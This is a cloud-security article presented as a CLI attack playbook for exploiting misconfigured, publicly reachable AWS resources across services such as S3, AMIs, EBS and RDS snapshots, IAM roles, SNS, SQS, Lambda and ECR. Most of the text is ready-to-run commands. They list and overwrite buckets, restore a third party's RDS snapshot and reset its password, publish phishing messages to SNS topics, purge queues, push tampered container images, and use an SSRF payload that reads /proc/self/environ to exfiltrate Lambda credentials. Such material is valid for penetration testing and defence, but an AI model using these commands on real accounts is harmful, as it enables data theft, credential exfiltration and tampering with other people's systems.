
Article by Eduard Agavriloae

Exploiting Public AWS Resources - CLI Attack Playbook

  • Tools mentioned in this article


    CloudShovel: A tool for scanning public or private AMIs for sensitive files and secrets

    coldsnap: A command line interface for Amazon EBS snapshots

This playbook shows how to exploit AWS resources that can be misconfigured to be publicly accessible. Think of it as a glossary of quick exploitation techniques that can be performed programmatically.

All attacks are meant to be executed from an external AWS environment in which the attacker ideally has administrator privileges.

The document is split into two categories:

1. Services and resources that can be found from a black-box perspective with little to reasonable effort
2. Services and resources that require information that can't be obtained through enumeration or brute-force

1. Can be found from black-box perspective

These services might be found through Awseye, Google dorking, enumeration, searches by AWS account ID, and other reasonable methods.

S3 Buckets

Public List, Read and Write

Misconfiguration:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadWrite",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:ListBucket",
                "s3:GetObject",
                "s3:PutObject"
            ],
            "Resource": [
                "arn:aws:s3:::example-bucket",
                "arn:aws:s3:::example-bucket/*"
            ]
        }
    ]
}
bucket_name="example-bucket"
region="region"

# List bucket contents via HTTP
curl https://$bucket_name.s3.$region.amazonaws.com/

# List bucket contents via CLI unauthenticated
# --no-sign-request will perform the API call unauthenticated
aws --no-sign-request s3 ls s3://$bucket_name

# List all objects including in subfolders unauthenticated
aws --no-sign-request s3api list-objects-v2 --bucket $bucket_name

file_name="target-file"

# Download file from bucket unauthenticated
aws --no-sign-request s3 cp s3://$bucket_name/$file_name .

# Upload file unauthenticated
# Objects with the same key are overwritten
echo "hackingthe.cloud" > $file_name.new
aws --no-sign-request s3 cp $file_name.new s3://$bucket_name/

Authenticated List and Write

Misconfiguration: - ACL misconfigured at the object level so that any authenticated AWS identity (from any account) can access the file, while unauthenticated access is denied
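Such a misconfiguration lives in the object's ACL rather than the bucket policy. A sketch of what `aws s3api get-object-acl` could return for an affected object (the owner values are placeholders; the grant to the global AuthenticatedUsers group is what opens the object to any AWS account):

```json
{
    "Owner": {
        "DisplayName": "example-owner",
        "ID": "exampleownercanonicalid"
    },
    "Grants": [
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
            },
            "Permission": "READ"
        }
    ]
}
```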

bucket_name="example-bucket"
region="region"

# This will not work because unauthenticated access is denied
curl https://$bucket_name.s3.$region.amazonaws.com/

# List bucket contents via authenticated CLI
aws s3 ls s3://$bucket_name

S3 Static Website List Unauthenticated

Misconfiguration: - Static website allowing bucket to be listed

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadGetIndex",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": [
                "s3:ListBucket",
                "s3:GetObject"
            ],
            "Resource": [
                "arn:aws:s3:::example-bucket",
                "arn:aws:s3:::example-bucket/*"
            ]
        }
    ]
}
bucket_name="example-bucket"
region="region"

# This will return the index.html
# Note that S3 website endpoints support only HTTP
curl http://$bucket_name.s3-website.$region.amazonaws.com

# Removing the '-website' from the URL will list the files
# This works because the bucket is misconfigured
curl https://$bucket_name.s3.$region.amazonaws.com

# List bucket contents via CLI, authenticated or
# unauthenticated (add --no-sign-request for the latter)
aws s3 ls s3://$bucket_name
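The two endpoint formats above differ only in the host name. A small helper to build both (illustrative; note that some older regions use 's3-website-<region>' with a dash instead of a dot):

```shell
# Build the REST and static-website endpoint URLs for a bucket
# Website endpoints are HTTP-only; REST endpoints support HTTPS
s3_rest_url()    { echo "https://$1.s3.$2.amazonaws.com"; }
s3_website_url() { echo "http://$1.s3-website.$2.amazonaws.com"; }

s3_rest_url example-bucket eu-central-1
s3_website_url example-bucket eu-central-1
```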

AMIs

# Find the target AMI
# Use '--include-deprecated' to make sure you get all results
# You'll have to search across every region since AMIs are region-specific

# Search by owner account
aws --region $region ec2 describe-images --owners 123456789012 --include-deprecated

# Search by description or name
aws ec2 describe-images --filters Name="description",Values="*hackingthe.cloud*" --include-deprecated
aws ec2 describe-images --filters Name="name",Values="*hackingthe.cloud*" --include-deprecated

# Automatically scan the AMI with CloudShovel
# --bucket specifies where the extracted files are saved
# This might not work if CloudShovel is executed multiple
# times in the same environment
cloudshovel --region $region --bucket example-bucket ami-example1234567890

# Manual approach
# Start an EC2 instance based on the target AMI and save
# the instance ID returned
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
# If the command fails then you might have to use another instance-type like c5.large
# You can specify '--no-associate-public-ip-address' if you don't want the instance
# to have a public IP, but you'll need a VPC Endpoint to connect to it via
# ec2-instance-connect
aws ec2 run-instances --security-group-ids sg-example1234567890 --instance-type t2.micro --image-id ami-example1234567890 

# Try to connect to it using EC2 Instance Connect
aws ec2-instance-connect ssh --os-user root --instance-id i-example1234567890
# Search for files and secrets once connected
# If the command fails then most likely you'll have to
# use a different method to access the AMI's contents:
# 1. You can use CloudShovel
# 2. Make an EBS snapshot of the volume(s) and download it with coldsnap

# When you're done you can terminate the instance
aws ec2 terminate-instances --instance-ids $instance_id

EBS Snapshots

region=region

# Search by AWS account ID
aws ec2 describe-snapshots --owner-ids 123456789012

# Search by description
aws ec2 describe-snapshots --filters "Name=description,Values=*hackingthe.cloud*"

# Create volume from snapshot
# The availability zone must be the same as the instance we 
# will create shortly in order to attach the new volume there
aws ec2 create-volume --availability-zone $region'a' --snapshot-id snap-example1234567890

# Alternatively you can try to copy the snapshot and
# operate with it from there
# aws ec2 copy-snapshot --source-snapshot-id snap-example1234567890 --source-region $region

# Check if status is 'ok'
# Volume id is from the 'create-volume' API call
aws ec2 describe-volume-status --volume-ids $volume_id

# Start a new EC2 instance in the same Availability Zone
# The Image Id is for an Amazon Linux image and has
# nothing to do with the public AMI from the previous section
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
aws ec2 run-instances --security-group-ids sg-example1234567890 --instance-type t2.micro --placement AvailabilityZone=$region'a' --image-id ami-example1234567890

# Attach volume to your instance and specify as device
# anything from /dev/sdf to /dev/sdp (you can use /dev/sdf)
# --instance-id is from 'run-instances' API call
aws ec2 attach-volume --volume-id $volume_id --instance-id $instance_id --device /dev/sdf

# Connect to the instance
aws ec2-instance-connect ssh --os-user root --instance-id $instance_id
# Mount the volume
# lsblk
# Depending on the instance type, the device can show up
# as /dev/xvdf or /dev/nvme1n1 instead of /dev/sdf
# mount /dev/sdf1 /mnt
# Search the volume for files and secrets 

# Terminate the instance when you're done
aws ec2 terminate-instances --instance-ids $instance_id

# Delete the volume created
aws ec2 delete-volume --volume-id $volume_id

RDS Snapshots

# Depending on the engine of the target snapshot, you'll have to install
# the tool for connecting to the RDS server
# We'll use MySQL in this example 

# Search based on AWS account id using jq
# because there is no native way to do this
# Copy the DBSnapshotIdentifier
aws rds describe-db-snapshots --include-public | jq '.DBSnapshots[] | select(.DBSnapshotArn | contains("123456789012:"))'
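To illustrate the jq filter above locally (sample data only, not real API output; snapshot names are made up):

```shell
# Simulated describe-db-snapshots output: two public snapshots,
# only one owned by the target account 123456789012
sample='{"DBSnapshots":[
  {"DBSnapshotIdentifier":"target-snap","DBSnapshotArn":"arn:aws:rds:eu-central-1:123456789012:snapshot:target-snap"},
  {"DBSnapshotIdentifier":"other-snap","DBSnapshotArn":"arn:aws:rds:eu-central-1:999999999999:snapshot:other-snap"}
]}'

# The same select() filter keeps only the target account's snapshot
echo "$sample" | jq '.DBSnapshots[] | select(.DBSnapshotArn | contains("123456789012:"))'
```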

# Restore Snapshot
# Use the DBSnapshotIdentifier from above and create
# a security group that allows all inbound traffic if
# you don't already have one and use it here
# $db_instance_identifier should be a new custom name for
# the new db 
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier $db_instance_identifier \
    --db-snapshot-identifier $db_snapshot_identifier \
    --vpc-security-group-ids sg-example1234567890 --publicly-accessible --no-multi-az

# This will take around 5-15 minutes so you can run this
# command to know when the database was restored
# The DB Instance Identifier should be the same, but you
# can get it from the output of the previous command
aws rds wait db-instance-available --db-instance-identifier $db_instance_identifier

# Change login password
# In the response you will also see the RDS
# endpoint address. Copy that for connecting
# to the instance. The username for login can
# be found in the same response under "MasterUsername"
aws rds modify-db-instance \
    --db-instance-identifier $db_instance_identifier \
    --master-user-password MyNewPassword123! \
    --apply-immediately

# Connect to the database
mysql -h $url_db -u $username --skip-ssl -p
# show databases;
# use $database;
# show tables;

# Delete RDS instance
aws rds delete-db-instance --db-instance-identifier $db_instance_identifier --skip-final-snapshot

IAM Roles

There are roles that can be assumed using various 3rd-party technologies if the role's trust policy is misconfigured.

Documented attacks on bad OIDC configurations: - GitHub - Terraform Cloud - GitLab

While the OIDC misconfigurations can be exploited from the internet, the attacks are more complex than what this document aims to cover. Please refer to the original or related articles on the aforementioned attacks.
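In the simplest case, exploited below, the role's trust policy allows any AWS principal to assume it. A sketch of such a trust policy (the Sid is made up):

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PubliclyAssumable",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
```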

# Assuming a public role
role_name=example-role
# Try to assume role
aws sts assume-role \
    --role-arn arn:aws:iam::123456789012:role/$role_name \
    --role-session-name any-name

# Configure returned credentials
aws --profile any-name configure set aws_access_key_id $access_key_id
aws --profile any-name configure set aws_secret_access_key $secret_access_key
aws --profile any-name configure set aws_session_token $session_token

# Validate credentials
aws --profile any-name sts get-caller-identity

SSM Documents

# Search by name prefix
aws ssm list-documents --filters "Key=Owner,Values=Public" "Key=Name,Values=hackingthe.cloud"

# Search by owner with jq
# Takes 15-30 seconds to execute
# Copy the value from the "Name" field
aws ssm list-documents --filters "Key=Owner,Values=Public" | jq '.DocumentIdentifiers[] | select(.Owner | contains("123456789012"))'

# List document versions
# Different versions can have different
# secrets or details
aws ssm list-document-versions --name $document_name

# Get document details
# If the document has more versions you can use --document-version $number
# to get details about that version
# If version is not specified then the default one is used
aws ssm describe-document --name $document_name

# Get the actual content of the document
# Use --document-version $number if multiple versions
aws ssm get-document --name $document_name

CloudFront

If the CloudFront distribution has a misconfigured S3 bucket as its origin, then even if the bucket is configured to block public access, it might be possible to list the bucket by accessing the distribution's URL. For this to work, the bucket policy needs to allow "s3:ListBucket" for the CloudFront Origin Access Identity (OAI). You will most likely not encounter this outside a lab.
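A sketch of the misconfigured bucket policy described above (bucket name and OAI ID are placeholders; granting "s3:ListBucket" to the OAI is the mistake that lets the distribution serve directory listings):

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowCloudFrontOAIListAndRead",
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::cloudfront:user/CloudFront Origin Access Identity EXAMPLEID123"
            },
            "Action": [
                "s3:ListBucket",
                "s3:GetObject"
            ],
            "Resource": [
                "arn:aws:s3:::example-bucket",
                "arn:aws:s3:::example-bucket/*"
            ]
        }
    ]
}
```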

# Try to list the bucket (Should not work)
# You won't know the bucket if you only have the distribution's URL
aws s3 ls s3://example-bucket

# Access the distribution and list the files
curl https://example1234567.cloudfront.net

# Read sensitive files
curl https://example1234567.cloudfront.net/$file

2. Can't be found from a black-box perspective

These services can't be identified from a purely black-box perspective (with the exception of public ECR repositories), but they can be misconfigured so that they are accessible from any external AWS account. For most of these services you need additional information that you most likely won't find on the internet or through brute-forcing and similar techniques.

SNS Topics

# List topic subscribers
# This will return the subscribers which can be
# email addresses or other services like SQS queues
# that might be public as well
aws sns list-subscriptions-by-topic --topic-arn arn:aws:sns:$region:123456789012:example-topic

# Get topic attributes
aws sns get-topic-attributes --topic-arn arn:aws:sns:$region:123456789012:example-topic

# Subscribe to the topic
# If you subscribe you will get a confirmation
# email with a link you have to access
# After confirming you will receive any messages sent
# to the topic
aws sns subscribe --topic-arn arn:aws:sns:$region:123456789012:example-topic \
        --protocol email \
        --notification-endpoint $email_address


# Publish to topic
# All subscribers will receive this message
# This can be leveraged to perform phishing attacks
aws sns publish --topic-arn arn:aws:sns:$region:123456789012:example-topic --message "This is the email body" --subject "This is the email subject"

SQS Queues

# Send message
aws sqs send-message \
    --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue \
    --message-body "Your message"

# Receive messages
# This does not delete the message; it only hides it from
# other consumers for the duration of the visibility timeout
aws sqs receive-message --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue

# Delete message
# Use the ReceiptHandle from the receive-message response;
# most consumer implementations delete messages this way
# after processing them
aws sqs delete-message \
    --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue \
    --receipt-handle $big_string_from_receive_message_call

# This will delete all items in the queue
aws sqs purge-queue --queue-url https://sqs.$region.amazonaws.com/123456789012/example-queue

Private API Gateways

A private API Gateway is private in the sense that it can't be accessed from outside AWS's network. A common misconception is that a private API Gateway can be accessed only from the owner's AWS account.
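A sketch of a resource policy that causes this (API ID, account, and region are placeholders): with Principal "*" and no condition on aws:SourceVpce, the API can be invoked through any execute-api VPC endpoint, including one created in an attacker's account.

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "execute-api:Invoke",
            "Resource": "arn:aws:execute-api:eu-central-1:123456789012:example123/*"
        }
    ]
}
```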

# Example API Gateway details
api_id=example123
region=eu-central-1
stage=prod
endpoint=fetch

# Try to access the API gateway from your host/VM
# It should not work
curl https://$api_id.execute-api.$region.amazonaws.com/$stage/$endpoint
nslookup $api_id.execute-api.$region.amazonaws.com

# We'll start an EC2 instance and perform the request from there
# The instance must be in the same region as the target API
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
# The AMI is for the latest Amazon Linux image at the moment of writing this article
# Save the instance ID for later
aws --region $region ec2 run-instances --security-group-ids sg-example1234567 --instance-type t2.micro --image-id ami-0b5673b5f6e8f7fa7

# Check if you have VPC endpoint com.amazonaws.$region.execute-api
aws --region $region ec2 describe-vpc-endpoints

# Skip this if the VPC endpoint already exists
# Create the VPC Endpoint
# Should take around 1-2 minutes to be available
# Run 'aws ec2 describe-instances', 'aws ec2 describe-vpcs'
# or 'aws ec2 describe-subnets' in order to get the
# information about the VPC id along with the subnet ids
# You have to use the same VPC as the one of the previous EC2
# Create a security group that allows all inbound traffic if
# you don't already have one and use it here
aws ec2 create-vpc-endpoint \
    --vpc-id vpc-example1234567 \
    --vpc-endpoint-type Interface \
    --service-name com.amazonaws.$region.execute-api \
    --subnet-ids subnet-example1234567,subnet-example1234567,subnet-example1234567 \
    --security-group-ids sg-example1234567 \
    --private-dns-enabled

# Connect to the instance
aws ec2-instance-connect ssh --os-user root --instance-id $instance_id
# Now we should be able to resolve and invoke the private API Gateway
# Check DNS resolution
nslookup $api_id.execute-api.$region.amazonaws.com

# Invoke the API
curl https://$api_id.execute-api.$region.amazonaws.com/$stage/$endpoint

Delete the instance and the VPC Endpoint when you're done. VPC Endpoints can get expensive.

Lambda Functions

function_name=example-function
# Invoke function via AWS CLI
# Because the function is from an external account, the
# whole ARN must be specified
# You can invoke a certain version of the function by adding its number at the end
# e.g. arn:aws:lambda:$region:123456789012:function:$function_name:1
aws lambda invoke --function-name arn:aws:lambda:$region:123456789012:function:$function_name \
    --payload '<input>' output.json

# If the function is vulnerable to SSRF you might
# be able to exfiltrate the access credentials by reading
# the contents of /proc/self/environ
# For this you need to specify --cli-binary-format
# This can also be used as a persistence technique
aws lambda invoke --function-name arn:aws:lambda:$region:123456789012:function:$function_name \
    --payload '{"queryStringParameters":{"url":"file:///proc/self/environ"}}' \
    --cli-binary-format raw-in-base64-out output.txt

# Invoke the function by its URL
# Just because the Lambda Function can be invoked
# by anyone, doesn't mean it will have a public URL
# There is no known way to reverse the function URL
# to get the function ARN or vice-versa
curl https://examplexample12345678901234567890exa.lambda-url.$region.on.aws/?url=file:///proc/self/environ > output.txt
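Note that /proc/self/environ separates variables with NUL bytes, so the exfiltrated file can look like a single long line. A quick way to make it greppable (the file contents below are fake placeholders simulating an exfiltrated response):

```shell
# Simulate an exfiltrated /proc/self/environ: variables are
# separated by NUL bytes, not newlines (the values are fake)
printf 'AWS_ACCESS_KEY_ID=ASIAEXAMPLE\0AWS_SECRET_ACCESS_KEY=examplesecret\0AWS_SESSION_TOKEN=exampletoken\0' > output.txt

# Translate NUL bytes to newlines so the credentials become greppable
tr '\0' '\n' < output.txt | grep '^AWS_'
```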

ECR Repositories

Private Repository Access

Even if the repository is private, it can be misconfigured so that it allows any other AWS account to access it.

# Login first
# This command might not work on Windows
aws ecr get-login-password | docker login \
    --username AWS \
    --password-stdin 123456789012.dkr.ecr.$region.amazonaws.com/example-private

# Pull image
docker pull 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest

# Inspect image for secrets
# You can search the image in multiple ways
docker history 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest --no-trunc
docker inspect 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest
docker run -it 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest cat /etc/environment

# You can even push a new version of the image
# if the ECR is that badly misconfigured
docker push 123456789012.dkr.ecr.$region.amazonaws.com/example-private:latest

Public Repository Access

This is the case where a company created a public repository instead of a private one. Unlike the other services in section 2, this one can be found from a black-box perspective.

# You can find the repository by searching it
# https://gallery.ecr.aws/search?searchTerm=hackingthe.cloud

# Login
# The public ECR is available only in us-east-1
aws ecr-public get-login-password --region us-east-1 | docker login \
    --username AWS \
    --password-stdin public.ecr.aws/id123456/example-public


# Pull public image
docker pull public.ecr.aws/id123456/example-public

# Inspect image for secrets
# You can search the image in multiple ways
docker history public.ecr.aws/id123456/example-public --no-trunc
docker inspect public.ecr.aws/id123456/example-public
docker run -it public.ecr.aws/id123456/example-public cat /etc/environment

Call for contributions

Do you know other relevant services that can be misconfigured so that they grant read, write or execute permissions over their resources? Feel free to add or suggest them.

One service that should be included in this document is AWS Cognito. However, AWS recently made changes to how Cognito can be configured, and further analysis is required before I can vouch for the attacks against it.